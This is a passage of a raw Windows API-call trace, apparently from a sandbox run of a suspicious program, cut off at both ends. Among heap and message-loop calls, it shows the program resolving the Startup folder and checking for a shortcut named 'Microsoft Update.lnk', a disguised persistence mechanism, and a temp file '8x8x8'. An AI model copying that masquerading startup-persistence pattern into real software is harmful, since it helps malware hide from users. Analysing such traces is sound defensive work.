hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0252.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0252.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0252.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865268 | out: hHeap=0x2af0000) returned 1 [0252.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0252.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0252.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0252.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0252.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0252.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0252.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0252.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0252.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0252.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0252.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0252.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0252.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0252.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0252.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0252.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0252.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0252.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0252.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0252.694] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0252.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0252.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0252.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0252.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0252.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0252.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0252.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0252.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0252.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0252.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0252.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0252.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0252.695] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0252.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0252.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0252.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5a8 [0252.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0252.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0252.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab710 [0252.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0252.695] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0252.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0252.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0252.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0252.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0252.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0252.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0252.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0252.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0252.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0252.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0252.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0252.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0252.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0252.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0252.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0252.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0252.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0252.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0252.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0252.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0252.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0252.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0252.699] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0252.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0252.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0252.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0252.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0252.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0252.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0252.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0252.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0252.767] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0252.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0252.767] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0252.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0252.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0252.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0252.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0252.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0252.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0252.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0252.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0252.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0252.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0252.770] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0252.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0252.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0252.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0252.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0252.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0252.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0252.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0252.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0252.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0252.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0252.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0252.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0252.771] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0252.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0252.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0252.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0252.771] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0252.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0252.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0252.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0252.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0252.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0252.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0252.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0252.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0252.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0252.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0252.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb058 | out: hHeap=0x2af0000) returned 1 [0252.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0252.771] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0252.796] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0252.797] timeGetTime () returned 0x117f0df [0252.797] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0252.797] Sleep (dwMilliseconds=0xa) [0252.841] timeGetTime () returned 0x117f10e [0252.841] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0252.841] Sleep (dwMilliseconds=0xa) [0252.888] timeGetTime () returned 0x117f13c [0252.888] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0252.888] Sleep (dwMilliseconds=0xa) [0252.929] timeGetTime () returned 0x117f15c [0252.929] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0252.929] Sleep (dwMilliseconds=0xa) [0252.958] timeGetTime () returned 0x117f183 [0252.958] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0252.958] Sleep (dwMilliseconds=0xa) [0253.015] timeGetTime () returned 0x117f1b9 [0253.015] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0253.016] TranslateMessage (lpMsg=0x8cf798) returned 0 [0253.016] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0253.016] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0253.016] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0253.016] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.016] Sleep (dwMilliseconds=0xa) [0253.029] timeGetTime () returned 0x117f1c9 [0253.029] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.029] Sleep (dwMilliseconds=0xa) [0253.056] timeGetTime () returned 0x117f1da [0253.056] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.056] Sleep (dwMilliseconds=0xa) [0253.075] timeGetTime () returned 0x117f1f8 [0253.075] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.075] Sleep (dwMilliseconds=0xa) [0253.091] timeGetTime () returned 0x117f208 [0253.091] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.091] Sleep (dwMilliseconds=0xa) [0253.106] timeGetTime () returned 0x117f217 [0253.106] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.106] Sleep (dwMilliseconds=0xa) [0253.122] timeGetTime () returned 0x117f227 [0253.122] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.122] Sleep (dwMilliseconds=0xa) [0253.140] timeGetTime () returned 0x117f236 [0253.140] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.140] Sleep (dwMilliseconds=0xa) [0253.178] timeGetTime () returned 0x117f256 [0253.178] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.178] Sleep (dwMilliseconds=0xa) [0253.216] timeGetTime () returned 0x117f285 [0253.216] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.216] Sleep (dwMilliseconds=0xa) [0253.263] timeGetTime () returned 0x117f2b3 [0253.263] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.263] Sleep (dwMilliseconds=0xa) [0253.288] timeGetTime () returned 0x117f2c3 [0253.288] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.288] Sleep (dwMilliseconds=0xa) [0253.309] timeGetTime () returned 0x117f2e2 [0253.309] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.309] Sleep (dwMilliseconds=0xa) [0253.325] timeGetTime () returned 0x117f2f2 [0253.325] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.325] Sleep (dwMilliseconds=0xa) [0253.351] timeGetTime () returned 0x117f302 [0253.351] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.351] Sleep (dwMilliseconds=0xa) [0253.373] timeGetTime () returned 0x117f321 [0253.373] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.373] Sleep (dwMilliseconds=0xa) [0253.387] timeGetTime () returned 0x117f330 [0253.388] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.388] Sleep (dwMilliseconds=0xa) [0253.449] timeGetTime () returned 0x117f361 [0253.449] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.449] Sleep (dwMilliseconds=0xa) [0253.473] timeGetTime () returned 0x117f386 [0253.473] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.473] Sleep (dwMilliseconds=0xa) [0253.497] timeGetTime () returned 0x117f39e [0253.497] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.497] Sleep (dwMilliseconds=0xa) [0253.513] timeGetTime () returned 0x117f3ad [0253.513] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.513] Sleep (dwMilliseconds=0xa) [0253.528] timeGetTime () returned 0x117f3bd [0253.528] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.528] Sleep (dwMilliseconds=0xa) [0253.544] timeGetTime () returned 0x117f3cd [0253.544] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.544] Sleep (dwMilliseconds=0xa) [0253.559] timeGetTime () returned 0x117f3dc [0253.559] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.559] Sleep (dwMilliseconds=0xa) [0253.583] timeGetTime () returned 0x117f3ec [0253.583] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.583] Sleep (dwMilliseconds=0xa) [0253.620] timeGetTime () returned 0x117f40b [0253.620] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.620] Sleep (dwMilliseconds=0xa) [0253.648] timeGetTime () returned 0x117f435 [0253.648] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.648] Sleep (dwMilliseconds=0xa) [0253.681] timeGetTime () returned 0x117f451 [0253.681] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.681] Sleep (dwMilliseconds=0xa) [0253.702] timeGetTime () returned 0x117f461 [0253.702] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.702] Sleep (dwMilliseconds=0xa) [0253.739] timeGetTime () returned 0x117f490 [0253.739] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.739] Sleep (dwMilliseconds=0xa) [0253.754] timeGetTime () returned 0x117f49f [0253.754] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.754] Sleep (dwMilliseconds=0xa) [0253.771] timeGetTime () returned 0x117f4af [0253.771] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0253.771] TranslateMessage (lpMsg=0x8cf798) returned 0 [0253.771] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0253.771] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0253.771] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0253.771] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.771] Sleep (dwMilliseconds=0xa) [0253.786] timeGetTime () returned 0x117f4be [0253.786] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0253.786] Sleep (dwMilliseconds=0xa) [0253.801] timeGetTime () returned 0x117f4ce [0253.801] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0253.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0253.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0253.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0253.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0253.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0253.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0253.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0253.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0253.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0253.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0253.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0253.802] RtlAllocateHeap 